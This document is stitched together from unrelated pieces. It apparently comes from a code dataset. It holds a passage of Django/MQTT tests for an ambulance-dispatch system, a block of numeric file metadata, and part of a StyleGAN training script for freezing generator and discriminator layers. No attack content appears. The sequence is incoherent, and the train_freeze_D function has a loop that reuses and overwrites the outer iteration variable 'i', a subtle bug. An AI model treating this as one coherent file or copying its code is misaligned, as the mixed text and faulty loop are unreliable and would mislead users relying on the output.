'status': CallStatus.P.name,
'priority': CallPriority.B.name,
'ambulancecall_set': [
{
'ambulance_id': ambulance_id1,
'waypoint_set': [
{
'order': 0,
'location': {
'type': LocationType.i.name,
'number': '123',
'street': 'asdasdasd asd asd asdas'
}
}
]
},
{
'ambulance_id': ambulance_id2,
'waypoint_set': [
{
'order': 0,
'location': {
'type': LocationType.i.name,
'number': '123',
'street': 'asdasdasd asd asd asdas'
}
}
]
}
],
# 'ambulancecall_set': [{'ambulance_id': ambulance_id1}, {'ambulance_id': ambulance_id2}],
'patient_set': [{'name': 'Jose', 'age': 3}, {'name': 'Maria', 'age': 10}]
}
serializer = CallSerializer(data=call)
serializer.is_valid()
call = serializer.save(updated_by=self.u1)
# process messages
self.loop(test_client)
subscribe_client.loop()
# Check if call status is Pending
call = Call.objects.get(id=call.id)
self.assertEqual(call.status, CallStatus.P.name)
# Check if ambulancecall status is Requested
ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id1)
self.assertEqual(ambulancecall.status, AmbulanceCallStatus.R.name)
# Check if ambulancecall status is Requested
ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id2)
self.assertEqual(ambulancecall.status, AmbulanceCallStatus.R.name)
# test_client publishes client_id to location_client
test_client.publish('user/{}/client/{}/ambulance/{}/data'.format(username, client_id, ambulance_id1),
json.dumps({
'location_client_id': client_id,
}))
# process messages
self.loop(test_client)
subscribe_client.loop()
# test_client publishes "Accepted" to call status
test_client.publish('user/{}/client/{}/ambulance/{}/call/{}/status'.format(username, client_id,
ambulance_id1, call.id), AmbulanceCallStatus.A.value.casefold())
# process messages
self.loop(test_client)
subscribe_client.loop()
# subscribe to call and ambulance call status
test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id1))
self.is_subscribed(test_client)
# process messages
self.loop(test_client)
subscribe_client.loop()
# Check if call status changed to Started
call = Call.objects.get(id=call.id)
self.assertEqual(call.status, CallStatus.S.name)
# Check if ambulancecall status changed to accepted
ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id1)
self.assertEqual(ambulancecall.status, AmbulanceCallStatus.A.name)
# Check if ambulancecall status is Requested
ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id2)
self.assertEqual(ambulancecall.status, AmbulanceCallStatus.R.name)
# subscribe to call and ambulance call status
test_client.expect('call/{}/data'.format(call.id))
self.is_subscribed(test_client)
# process messages
self.loop(test_client)
subscribe_client.loop()
# test_client publishes "patient bound" to status
test_client.publish('user/{}/client/{}/ambulance/{}/data'.format(username, client_id, ambulance_id1),
json.dumps({
'status': AmbulanceStatus.PB.name,
}))
# process messages
self.loop(test_client)
subscribe_client.loop()
# test_client publishes "at patient" to status
test_client.publish('user/{}/client/{}/ambulance/{}/data'.format(username, client_id, ambulance_id1),
json.dumps({
'status': AmbulanceStatus.AP.name,
}))
# process messages
self.loop(test_client)
subscribe_client.loop()
# test_client publishes "hospital bound" to status
test_client.publish('user/{}/client/{}/ambulance/{}/data'.format(username, client_id, ambulance_id1),
json.dumps({
'status': AmbulanceStatus.HB.name,
}))
# process messages
self.loop(test_client)
subscribe_client.loop()
# test_client publishes "at hospital" to status
test_client.publish('user/{}/client/{}/ambulance/{}/data'.format(username, client_id, ambulance_id1),
json.dumps({
'status': AmbulanceStatus.AH.name,
}))
# process messages
self.loop(test_client)
subscribe_client.loop()
# test_client publishes "completed" to call status
test_client.publish('user/{}/client/{}/ambulance/{}/call/{}/status'.format(username, client_id,
ambulance_id1, call.id),
AmbulanceCallStatus.C.value.casefold())
# process messages
self.loop(test_client)
subscribe_client.loop()
# expect 'Completed' ambulancecall
test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id1))
self.is_subscribed(test_client)
# expect blank ambulancecall
test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id1))
self.is_subscribed(test_client)
# process messages
self.loop(test_client)
subscribe_client.loop()
# Check if ambulancecall status is Completed
ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id1)
self.assertEqual(ambulancecall.status, AmbulanceCallStatus.C.name)
# Check if ambulancecall status is Requested
ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id2)
self.assertEqual(ambulancecall.status, AmbulanceCallStatus.R.name)
# Check if call status is Started
call = Call.objects.get(id=call.id)
self.assertEqual(call.status, CallStatus.S.name)
# Client handshake
test_client.publish('user/{}/client/{}/status'.format(username, client_id), 'offline')
# process messages
self.loop(test_client)
subscribe_client.loop()
# wait for disconnect
test_client.wait()
# Start second test client
username2 = 'testuser2'
password2 = 'very_secret'
client_id2 = 'test_mqtt_subscribe2'
broker.update(settings.MQTT)
broker['USERNAME'] = username2
broker['PASSWORD'] = password2
broker['CLIENT_ID'] = client_id2
test_client2 = MQTTTestClient(broker,
check_payload=False,
debug=True)
self.is_connected(test_client2)
# Client handshake
test_client2.publish('user/{}/client/{}/status'.format(username2, client_id2), 'online')
# process messages
self.loop(test_client2)
subscribe_client.loop()
# check record
clnt = Client.objects.get(client_id=client_id2)
self.assertEqual(clnt.status, ClientStatus.O.name)
# check record log
obj = ClientLog.objects.get(client=clnt)
self.assertEqual(obj.status, ClientStatus.O.name)
# Ambulance handshake: ambulance login
test_client2.publish('user/{}/client/{}/ambulance/{}/status'.format(username2, client_id2, ambulance_id2),
'ambulance login')
# process messages
self.loop(test_client2)
subscribe_client.loop()
# check record
clnt = Client.objects.get(client_id=client_id2)
self.assertEqual(clnt.status, ClientStatus.O.name)
self.assertEqual(clnt.ambulance.id, ambulance_id2)
# subscribe ambulance call status
test_client2.expect('ambulance/{}/call/+/status'.format(ambulance_id2))
self.is_subscribed(test_client2)
# Check if call status is Starting
call = Call.objects.get(id=call.id)
self.assertEqual(call.status, CallStatus.S.name)
# Check if ambulancecall1 status is Completed
ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id1)
self.assertEqual(ambulancecall.status, AmbulanceCallStatus.C.name)
# Check if ambulancecall2 status is Requested
ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id2)
self.assertEqual(ambulancecall.status, AmbulanceCallStatus.R.name)
# test_client publishes client_id to location_client
test_client2.publish('user/{}/client/{}/ambulance/{}/data'.format(username2, client_id2, ambulance_id2),
json.dumps({
'location_client_id': client_id2,
}))
# process messages
self.loop(test_client2)
subscribe_client.loop()
# test_client publishes "Accepted" to call status
test_client2.publish('user/{}/client/{}/ambulance/{}/call/{}/status'.format(username2, client_id2,
ambulance_id2, call.id),
AmbulanceCallStatus.A.value.casefold())
# process messages
self.loop(test_client2)
subscribe_client.loop()
# subscribe ambulance call status
test_client2.expect('ambulance/{}/call/+/status'.format(ambulance_id2))
self.is_subscribed(test_client2)
# process messages
self.loop(test_client2)
subscribe_client.loop()
# Check if call status is Started
call = Call.objects.get(id=call.id)
self.assertEqual(call.status, CallStatus.S.name)
# Check if ambulancecall1 status is Completed
ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id1)
self.assertEqual(ambulancecall.status, AmbulanceCallStatus.C.name)
# Check if ambulancecall2 status is accepted
ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id2)
self.assertEqual(ambulancecall.status, AmbulanceCallStatus.A.name)
# subscribe to call
test_client2.expect('call/{}/data'.format(call.id))
self.is_subscribed(test_client2)
# process messages
self.loop(test_client2)
subscribe_client.loop()
# test_client publishes "patient bound" to status
test_client2.publish('user/{}/client/{}/ambulance/{}/data'.format(username2, client_id2, ambulance_id2),
json.dumps({
'status': AmbulanceStatus.PB.name,
}))
# process messages
self.loop(test_client2)
subscribe_client.loop()
# test_client publishes "at patient" to status
test_client2.publish('user/{}/client/{}/ambulance/{}/data'.format(username2, client_id2, ambulance_id2),
json.dumps({
'status': AmbulanceStatus.AP.name,
}))
# process messages
self.loop(test_client2)
subscribe_client.loop()
# test_client publishes "hospital bound" to status
test_client2.publish('user/{}/client/{}/ambulance/{}/data'.format(username2, client_id2, ambulance_id2),
json.dumps({
'status': AmbulanceStatus.HB.name,
}))
# process messages
self.loop(test_client2)
subscribe_client.loop()
# test_client publishes "at hospital" to status
test_client2.publish('user/{}/client/{}/ambulance/{}/data'.format(username2, client_id2, ambulance_id2),
json.dumps({
'status': AmbulanceStatus.AH.name,
}))
# process messages
self.loop(test_client2)
subscribe_client.loop()
# test_client publishes "completed" to call status
test_client2.publish('user/{}/client/{}/ambulance/{}/call/{}/status'.format(username2, client_id2,
ambulance_id2, call.id),
AmbulanceCallStatus.C.value.casefold())
# process messages
self.loop(test_client2)
subscribe_client.loop()
# expect status completed ambulancecall
test_client2.expect('ambulance/{}/call/+/status'.format(ambulance_id2))
self.is_subscribed(test_client2)
# expect blank ambulancecall
test_client2.expect('ambulance/{}/call/+/status'.format(ambulance_id2))
self.is_subscribed(test_client2)
# expect status ended call
test_client2.expect('call/{}/data'.format(call.id))
self.is_subscribed(test_client)
# expect blank call
test_client2.expect('call/{}/data'.format(call.id))
self.is_subscribed(test_client2)
# process messages
self.loop(test_client2)
subscribe_client.loop()
# Check if ambulancecall1 status is Completed
ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id1)
self.assertEqual(ambulancecall.status, AmbulanceCallStatus.C.name)
# Check if ambulancecall2 status is Completed
ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id2)
self.assertEqual(ambulancecall.status, AmbulanceCallStatus.C.name)
# Check if call status is Ended
call = Call.objects.get(id=call.id)
self.assertEqual(call.status, CallStatus.E.name)
# Client handshake
test_client2.publish('user/{}/client/{}/status'.format(username2, client_id2), 'offline')
# process messages
self.loop(test_client2)
subscribe_client.loop()
# wait for disconnect
test_client2.wait()
subscribe_client.wait()
# TODO: Create another test where 2 clients to handle two ambulances simultaneously
class TestMQTTCallsMultipleAmbulancesSameTime(TestMQTT, MQTTTestCase):
def test(self, username=settings.MQTT['USERNAME'], password=settings.MQTT['PASSWORD'],
ambulance_id1=None, ambulance_id2=None):
if not ambulance_id1:
ambulance_id1 = self.a1.id
if not ambulance_id2:
ambulance_id2 = self.a3.id
# Start client as admin
broker = {
'HOST': 'localhost',
'PORT': 1883,
'KEEPALIVE': 60,
'CLEAN_SESSION': True
}
# Start subscribe client
broker.update(settings.MQTT)
broker['CLIENT_ID'] = 'test_mqttclient'
subscribe_client = SubscribeClient(broker,
debug=True)
self.is_connected(subscribe_client)
self.is_subscribed(subscribe_client)
# Start test client
broker.update(settings.MQTT)
client_id = 'test_mqtt_subscribe_admin'
broker['USERNAME'] = username
broker['PASSWORD'] = password
broker['CLIENT_ID'] = client_id
test_client1 = MQTTTestClient(broker,
check_payload=False,
debug=True)
self.is_connected(test_client1)
# Client handshake
test_client1.publish('user/{}/client/{}/status'.format(username, client_id), 'online')
# process messages
self.loop(test_client1)
subscribe_client.loop()
# check record
clnt = Client.objects.get(client_id=client_id)
self.assertEqual(clnt.status, ClientStatus.O.name)
# check record log
obj = ClientLog.objects.get(client=clnt)
self.assertEqual(obj.status, ClientStatus.O.name)
# Ambulance handshake: ambulance login
test_client1.publish('user/{}/client/{}/ambulance/{}/status'.format(username, client_id, ambulance_id1),
'ambulance login')
# process messages
self.loop(test_client1)
subscribe_client.loop()
# check record
clnt = Client.objects.get(client_id=client_id)
self.assertEqual(clnt.status, ClientStatus.O.name)
self.assertEqual(clnt.ambulance.id, ambulance_id1)
# subscribe to call and ambulance call status
test_client1.expect('ambulance/{}/call/+/status'.format(ambulance_id1))
self.is_subscribed(test_client1)
# Start second test client
username2 = 'testuser2'
password2 = 'very_secret'
client_id2 = 'test_mqtt_subscribe2'
broker.update(settings.MQTT)
broker['USERNAME'] = username2
broker['PASSWORD'] = password2
broker['CLIENT_ID'] = client_id2
test_client2 = MQTTTestClient(broker,
check_payload=False,
debug=True)
self.is_connected(test_client2)
# Client handshake
test_client2.publish('user/{}/client/{}/status'.format(username2, client_id2), 'online')
# process messages
self.loop(test_client2)
subscribe_client.loop()
# check record
clnt = Client.objects.get(client_id=client_id2)
self.assertEqual(clnt.status, ClientStatus.O.name)
# check record log
obj = ClientLog.objects.get(client=clnt)
self.assertEqual(obj.status, ClientStatus.O.name)
# Ambulance handshake: ambulance login
test_client2.publish('user/{}/client/{}/ambulance/{}/status'.format(username2, client_id2, ambulance_id2),
'ambulance login')
# process messages
self.loop(test_client2)
subscribe_client.loop()
# check record
clnt = Client.objects.get(client_id=client_id2)
self.assertEqual(clnt.status, ClientStatus.O.name)
self.assertEqual(clnt.ambulance.id, ambulance_id2)
# subscribe ambulance call status
test_client2.expect('ambulance/{}/call/+/status'.format(ambulance_id2))
self.is_subscribed(test_client2)
# create call using serializer, two ambulances
call = {
'status': CallStatus.P.name,
'priority': CallPriority.B.name,
'ambulancecall_set': [
{
'ambulance_id': ambulance_id1,
'waypoint_set': [
{
'order': 0,
'location': {
'type': LocationType.i.name,
'number': '123',
'street': 'asdasdasd asd asd asdas'
}
}
]
},
{
'ambulance_id': ambulance_id2,
'waypoint_set': [
{
'order': 0,
'location': {
'type': LocationType.i.name,
'number': '123',
'street': 'asdasdasd asd asd asdas'
}
}
]
}
],
'patient_set': [{'name': 'Jose', 'age': 3}, {'name': 'Maria', 'age': 10}]
}
serializer = CallSerializer(data=call)
serializer.is_valid()
call = serializer.save(updated_by=self.u1)
# process messages
self.loop(test_client1)
subscribe_client.loop()
# Check if call status is Pending
call = Call.objects.get(id=call.id)
self.assertEqual(call.status, CallStatus.P.name)
# Check if ambulancecall status is Requested
ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id1)
self.assertEqual(ambulancecall.status, AmbulanceCallStatus.R.name)
# Check if ambulancecall status is Requested
ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id2)
self.assertEqual(ambulancecall.status, AmbulanceCallStatus.R.name)
# test_client publishes client_id to location_client
test_client1.publish('user/{}/client/{}/ambulance/{}/data'.format(username, client_id, ambulance_id1),
json.dumps({
'location_client_id': client_id,
}))
# process messages
self.loop(test_client1)
subscribe_client.loop()
# test_client publishes "Accepted" to call status
test_client1.publish('user/{}/client/{}/ambulance/{}/call/{}/status'.format(username, client_id,
ambulance_id1, call.id), AmbulanceCallStatus.A.value.casefold())
# process messages
self.loop(test_client1)
subscribe_client.loop()
# subscribe to call and ambulance call status
test_client1.expect('ambulance/{}/call/+/status'.format(ambulance_id1))
self.is_subscribed(test_client1)
# process messages
self.loop(test_client1)
subscribe_client.loop()
# Check if call status changed to Started
call = Call.objects.get(id=call.id)
self.assertEqual(call.status, CallStatus.S.name)
# Check if ambulancecall status changed to accepted
ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id1)
self.assertEqual(ambulancecall.status, AmbulanceCallStatus.A.name)
# Check if ambulancecall status is Requested
ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id2)
self.assertEqual(ambulancecall.status, AmbulanceCallStatus.R.name)
# subscribe to call and ambulance call status
test_client1.expect('call/{}/data'.format(call.id))
self.is_subscribed(test_client1)
# process messages
self.loop(test_client1)
subscribe_client.loop()
# test_client publishes client_id to location_client
test_client2.publish('user/{}/client/{}/ambulance/{}/data'.format(username2, client_id2, ambulance_id2),
json.dumps({
'location_client_id': client_id2,
}))
# process messages
self.loop(test_client2)
subscribe_client.loop()
# test_client publishes "Accepted" to call status
test_client2.publish('user/{}/client/{}/ambulance/{}/call/{}/status'.format(username2, client_id2,
ambulance_id2, call.id),
AmbulanceCallStatus.A.value.casefold())
# process messages
self.loop(test_client2)
subscribe_client.loop()
# subscribe ambulance call status
test_client2.expect('ambulance/{}/call/+/status'.format(ambulance_id2))
self.is_subscribed(test_client2)
# process messages
self.loop(test_client2)
subscribe_client.loop()
# Check if call status is Started
call = Call.objects.get(id=call.id)
self.assertEqual(call.status, CallStatus.S.name)
# Check if ambulancecall1 status is accepted
ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id1)
self.assertEqual(ambulancecall.status, AmbulanceCallStatus.A.name)
# Check if ambulancecall2 status is accepted
ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id2)
self.assertEqual(ambulancecall.status, AmbulanceCallStatus.A.name)
# subscribe to call
test_client2.expect('call/{}/data'.format(call.id))
self.is_subscribed(test_client2)
# process messages
self.loop(test_client2)
subscribe_client.loop()
# will get call because of next call status change
test_client1.expect('call/{}/data'.format(call.id))
self.is_subscribed(test_client1)
# process messages
self.loop(test_client1)
subscribe_client.loop()
# test_client publishes "patient bound" to status
test_client1.publish('user/{}/client/{}/ambulance/{}/data'.format(username, client_id, ambulance_id1),
json.dumps({
'status': AmbulanceStatus.PB.name,
}))
# process messages
self.loop(test_client1)
subscribe_client.loop()
# test_client2 publishes "patient bound" to status
test_client2.publish('user/{}/client/{}/ambulance/{}/data'.format(username2, client_id2, ambulance_id2),
json.dumps({
'status': AmbulanceStatus.PB.name,
}))
# process messages
self.loop(test_client2)
subscribe_client.loop()
# test_client publishes "at patient" to status
test_client1.publish('user/{}/client/{}/ambulance/{}/data'.format(username, client_id, ambulance_id1),
json.dumps({
'status': AmbulanceStatus.AP.name,
}))
# process messages
self.loop(test_client1)
subscribe_client.loop()
# test_client publishes "at patient" to status
test_client2.publish('user/{}/client/{}/ambulance/{}/data'.format(username2, client_id2, ambulance_id2),
json.dumps({
'status': AmbulanceStatus.AP.name,
}))
# process messages
self.loop(test_client2)
subscribe_client.loop()
# test_client publishes "hospital bound" to status
test_client1.publish('user/{}/client/{}/ambulance/{}/data'.format(username, client_id, ambulance_id1),
json.dumps({
'status': AmbulanceStatus.HB.name,
}))
# process messages
self.loop(test_client1)
subscribe_client.loop()
# test_client publishes "hospital bound" to status
test_client2.publish('user/{}/client/{}/ambulance/{}/data'.format(username2, client_id2, ambulance_id2),
json.dumps({
'status': AmbulanceStatus.HB.name,
}))
# process messages
self.loop(test_client2)
subscribe_client.loop()
# test_client publishes "at hospital" to status
test_client1.publish('user/{}/client/{}/ambulance/{}/data'.format(username, client_id, ambulance_id1),
json.dumps({
'status': AmbulanceStatus.AH.name,
}))
# process messages
self.loop(test_client1)
subscribe_client.loop()
# test_client publishes "completed" to call status
test_client1.publish('user/{}/client/{}/ambulance/{}/call/{}/status'.format(username, client_id,
ambulance_id1, call.id),
AmbulanceCallStatus.C.value.casefold())
# process messages
self.loop(test_client1)
subscribe_client.loop()
# expect 'Completed' ambulancecall
test_client1.expect('ambulance/{}/call/+/status'.format(ambulance_id1))
self.is_subscribed(test_client1)
# expect blank ambulancecall
test_client1.expect('ambulance/{}/call/+/status'.format(ambulance_id1))
self.is_subscribed(test_client1)
# process messages
self.loop(test_client1)
subscribe_client.loop()
# Check if ambulancecall status is Completed
ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id1)
self.assertEqual(ambulancecall.status, AmbulanceCallStatus.C.name)
# Check if ambulancecall status is Requested
ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id2)
self.assertEqual(ambulancecall.status, AmbulanceCallStatus.A.name)
# Check if call status is Started
call = Call.objects.get(id=call.id)
self.assertEqual(call.status, CallStatus.S.name)
# test_client publishes "at hospital" to status
test_client2.publish('user/{}/client/{}/ambulance/{}/data'.format(username2, client_id2, ambulance_id2),
json.dumps({
'status': AmbulanceStatus.AH.name,
}))
# process messages
self.loop(test_client2)
subscribe_client.loop()
# test_client publishes "completed" to call status
test_client2.publish('user/{}/client/{}/ambulance/{}/call/{}/status'.format(username2, client_id2,
ambulance_id2, call.id),
AmbulanceCallStatus.C.value.casefold())
# process messages
self.loop(test_client2)
subscribe_client.loop()
# expect 'Completed' ambulancecall
test_client2.expect('ambulance/{}/call/+/status'.format(ambulance_id2))
self.is_subscribed(test_client2)
# expect blank ambulancecall
test_client2.expect('ambulance/{}/call/+/status'.format(ambulance_id2))
self.is_subscribed(test_client2)
# expect status ended call
test_client2.expect('call/{}/data'.format(call.id))
self.is_subscribed(test_client1)
# expect blank call
test_client2.expect('call/{}/data'.format(call.id))
self.is_subscribed(test_client2)
# expect 'Completed' ambulancecall -> does not receive since it was already made not retain
# test_client.expect('ambulance/{}/call/+/status'.format(ambulance_id1))
# self.is_subscribed(test_client)
# expect blank ambulancecall
test_client1.expect('ambulance/{}/call/+/status'.format(ambulance_id1))
self.is_subscribed(test_client1)
# expect status ended call
test_client1.expect('call/{}/data'.format(call.id))
self.is_subscribed(test_client1)
# expect blank call
test_client1.expect('call/{}/data'.format(call.id))
self.is_subscribed(test_client1)
# process messages
self.loop(test_client2, test_client1)
subscribe_client.loop()
# Check if ambulancecall status is Completed
ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id1)
self.assertEqual(ambulancecall.status, AmbulanceCallStatus.C.name)
# Check if ambulancecall status is Completed
ambulancecall = call.ambulancecall_set.get(ambulance_id=ambulance_id2)
self.assertEqual(ambulancecall.status, AmbulanceCallStatus.C.name)
# Check if call status is Ended
call = Call.objects.get(id=call.id)
self.assertEqual(call.status, CallStatus.E.name)
# Client handshake
test_client1.publish('user/{}/client/{}/status'.format(username, client_id), 'offline')
# process messages
self.loop(test_client1)
subscribe_client.loop()
# Client handshake
test_client2.publish('user/{}/client/{}/status'.format(username2, client_id2), 'offline')
# process messages
self.loop(test_client2)
subscribe_client.loop()
# wait for disconnect
test_client1.wait()
test_client2.wait()
subscribe_client.wait()
| 37.128304
| 148
| 0.583448
| 6,637
| 67,425
| 5.767817
| 0.034202
| 0.061388
| 0.048144
| 0.05828
| 0.962201
| 0.96126
| 0.958987
| 0.958596
| 0.955827
| 0.955147
| 0
| 0.00881
| 0.314868
| 67,425
| 1,815
| 149
| 37.14876
| 0.819872
| 0.15515
| 0
| 0.905804
| 0
| 0
| 0.107419
| 0.060201
| 0
| 0
| 0
| 0.000551
| 0.086584
| 1
| 0.008563
| false
| 0.015224
| 0.011418
| 0
| 0.028544
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
85b252c868005a15f7daa9c463988fd149e0da9b
| 14,645
|
py
|
Python
|
src/trainer.py
|
jjeamin/stylegan-pytorch-collections
|
7f2491d585a8e865c5cc4d61666e03308c49e683
|
[
"MIT"
] | 2
|
2021-11-12T10:44:05.000Z
|
2021-11-26T11:07:34.000Z
|
src/trainer.py
|
jjeamin/stylegan
|
7f2491d585a8e865c5cc4d61666e03308c49e683
|
[
"MIT"
] | null | null | null |
src/trainer.py
|
jjeamin/stylegan
|
7f2491d585a8e865c5cc4d61666e03308c49e683
|
[
"MIT"
] | null | null | null |
import torch
from tqdm import tqdm
from src.helper import *
from src.distributed import get_rank, reduce_loss_dict, reduce_sum, get_world_size
from src.non_leaking import augment
from torchvision import transforms, utils
def train_freeze_G(
args,
loader,
generator,
discriminator,
g_optim,
d_optim,
g_ema,
device
):
loader = sample_data(loader)
pbar = range(args.iter)
if get_rank() == 0:
pbar = tqdm(pbar, initial=args.start_iter, dynamic_ncols=True, smoothing=0.01)
mean_path_length = 0
d_loss_val = 0
r1_loss = torch.tensor(0.0, device=device)
g_loss_val = 0
path_loss = torch.tensor(0.0, device=device)
path_lengths = torch.tensor(0.0, device=device)
mean_path_length_avg = 0
loss_dict = {}
if args.distributed:
g_module = generator.module
d_module = discriminator.module
else:
g_module = generator
d_module = discriminator
accum = 0.5 ** (32 / (10 * 1000))
ada_augment = torch.tensor([0.0, 0.0], device=device)
ada_aug_p = args.augment_p if args.augment_p > 0 else 0.0
ada_aug_step = args.ada_target / args.ada_length
r_t_stat = 0
sample_z = torch.randn(args.n_sample, args.latent, device=device)
requires_grad(generator, False)
for idx in pbar:
i = idx + args.start_iter
if i > args.iter:
print("Done!")
break
# update D
real_img = next(loader)
real_img = real_img.to(device)
if args.finetune_loc <= 0:
requires_grad(generator, False)
else:
for loc in range(args.finetune_loc):
requires_grad(generator, False, target_layer=f'convs.{generator.num_layers-2-2*loc}')
requires_grad(generator, False, target_layer=f'convs.{generator.num_layers-3-2*loc}')
requires_grad(generator, False, target_layer=f'to_rgbs.{generator.log_size-3-loc}')
requires_grad(discriminator, True)
noise = mixing_noise(args.batch, args.latent, args.mixing, device)
fake_img, _ = generator(noise)
if args.augment:
real_img_aug, _ = augment(real_img, ada_aug_p)
fake_img, _ = augment(fake_img, ada_aug_p)
else:
real_img_aug = real_img
fake_pred = discriminator(fake_img)
real_pred = discriminator(real_img_aug)
d_loss = d_logistic_loss(real_pred, fake_pred)
loss_dict["d"] = d_loss
loss_dict["real_score"] = real_pred.mean()
loss_dict["fake_score"] = fake_pred.mean()
discriminator.zero_grad()
d_loss.backward()
d_optim.step()
if args.augment and args.augment_p == 0:
ada_augment += torch.tensor(
(torch.sign(real_pred).sum().item(), real_pred.shape[0]), device=device
)
ada_augment = reduce_sum(ada_augment)
if ada_augment[1] > 255:
pred_signs, n_pred = ada_augment.tolist()
r_t_stat = pred_signs / n_pred
if r_t_stat > args.ada_target:
sign = 1
else:
sign = -1
ada_aug_p += sign * ada_aug_step * n_pred
ada_aug_p = min(1, max(0, ada_aug_p))
ada_augment.mul_(0)
d_regularize = i % args.d_reg_every == 0
if d_regularize:
real_img.requires_grad = True
real_pred = discriminator(real_img)
r1_loss = d_r1_loss(real_pred, real_img)
discriminator.zero_grad()
(args.r1 / 2 * r1_loss * args.d_reg_every + 0 * real_pred[0]).backward()
d_optim.step()
loss_dict["r1"] = r1_loss
# update G
if args.finetune_loc <= 0:
requires_grad(generator, True)
else:
for loc in range(args.finetune_loc):
requires_grad(generator, True, target_layer=f'convs.{generator.num_layers-2-2*loc}')
requires_grad(generator, True, target_layer=f'convs.{generator.num_layers-3-2*loc}')
requires_grad(generator, True, target_layer=f'to_rgbs.{generator.log_size-3-loc}')
requires_grad(discriminator, False)
noise = mixing_noise(args.batch, args.latent, args.mixing, device)
fake_img, _ = generator(noise)
if args.augment:
fake_img, _ = augment(fake_img, ada_aug_p)
fake_pred = discriminator(fake_img)
g_loss = g_nonsaturating_loss(fake_pred)
loss_dict["g"] = g_loss
generator.zero_grad()
g_loss.backward()
g_optim.step()
g_regularize = i % args.g_reg_every == 0
if args.finetune_loc < 0 and g_regularize:
path_batch_size = max(1, args.batch // args.path_batch_shrink)
noise = mixing_noise(path_batch_size, args.latent, args.mixing, device)
fake_img, latents = generator(noise, return_latents=True)
path_loss, mean_path_length, path_lengths = g_path_regularize(
fake_img, latents, mean_path_length
)
generator.zero_grad()
weighted_path_loss = args.path_regularize * args.g_reg_every * path_loss
if args.path_batch_shrink:
weighted_path_loss += 0 * fake_img[0, 0, 0, 0]
weighted_path_loss.backward()
g_optim.step()
mean_path_length_avg = (
reduce_sum(mean_path_length).item() / get_world_size()
)
loss_dict["path"] = path_loss
loss_dict["path_length"] = path_lengths.mean()
accumulate(g_ema, g_module, accum)
loss_reduced = reduce_loss_dict(loss_dict)
d_loss_val = loss_reduced["d"].mean().item()
g_loss_val = loss_reduced["g"].mean().item()
r1_val = loss_reduced["r1"].mean().item()
path_loss_val = loss_reduced["path"].mean().item()
real_score_val = loss_reduced["real_score"].mean().item()
fake_score_val = loss_reduced["fake_score"].mean().item()
path_length_val = loss_reduced["path_length"].mean().item()
if get_rank() == 0:
pbar.set_description(
(
f"d: {d_loss_val:.4f}; g: {g_loss_val:.4f}; r1: {r1_val:.4f}; "
f"path: {path_loss_val:.4f}; mean path: {mean_path_length_avg:.4f}; "
f"augment: {ada_aug_p:.4f}"
)
)
if i % 1000 == 0:
torch.cuda.empty_cache()
with torch.no_grad():
g_ema.eval()
sample, _ = g_ema([sample_z])
utils.save_image(
sample,
f"sample/{str(i).zfill(6)}.png",
nrow=int(args.n_sample ** 0.5),
normalize=True,
range=(-1, 1),
)
torch.cuda.empty_cache()
if i % 10000 == 0:
torch.save(
{
"g": g_module.state_dict(),
"d": d_module.state_dict(),
"g_ema": g_ema.state_dict(),
"g_optim": g_optim.state_dict(),
"d_optim": d_optim.state_dict(),
"args": args,
"ada_aug_p": ada_aug_p,
},
f"checkpoint/{str(i).zfill(6)}.pt",
)
def train_freeze_D(
args,
loader,
generator,
discriminator,
g_optim,
d_optim,
g_ema,
device
):
loader = sample_data(loader)
pbar = range(args.iter)
if get_rank() == 0:
pbar = tqdm(pbar, initial=args.start_iter, dynamic_ncols=True, smoothing=0.01)
mean_path_length = 0
d_loss_val = 0
r1_loss = torch.tensor(0.0, device=device)
g_loss_val = 0
path_loss = torch.tensor(0.0, device=device)
path_lengths = torch.tensor(0.0, device=device)
mean_path_length_avg = 0
loss_dict = {}
if args.distributed:
g_module = generator.module
d_module = discriminator.module
else:
g_module = generator
d_module = discriminator
accum = 0.5 ** (32 / (10 * 1000))
ada_augment = torch.tensor([0.0, 0.0], device=device)
ada_aug_p = args.augment_p if args.augment_p > 0 else 0.0
ada_aug_step = args.ada_target / args.ada_length
r_t_stat = 0
sample_z = torch.randn(args.n_sample, args.latent, device=device)
requires_grad(generator, False)
for idx in pbar:
i = idx + args.start_iter
if i > args.iter:
print("Done!")
break
# update D
real_img = next(loader)
real_img = real_img.to(device)
requires_grad(generator, False)
if args.freezeD:
for i in range(args.training_features):
requires_grad(discriminator, True, target_layer=f'convs.{6-i}')
requires_grad(discriminator, True, target_layer=f'final_')
else:
requires_grad(discriminator, True)
noise = mixing_noise(args.batch, args.latent, args.mixing, device)
fake_img, _ = generator(noise)
if args.augment:
real_img_aug, _ = augment(real_img, ada_aug_p)
fake_img, _ = augment(fake_img, ada_aug_p)
else:
real_img_aug = real_img
fake_pred = discriminator(fake_img)
real_pred = discriminator(real_img_aug)
d_loss = d_logistic_loss(real_pred, fake_pred)
loss_dict["d"] = d_loss
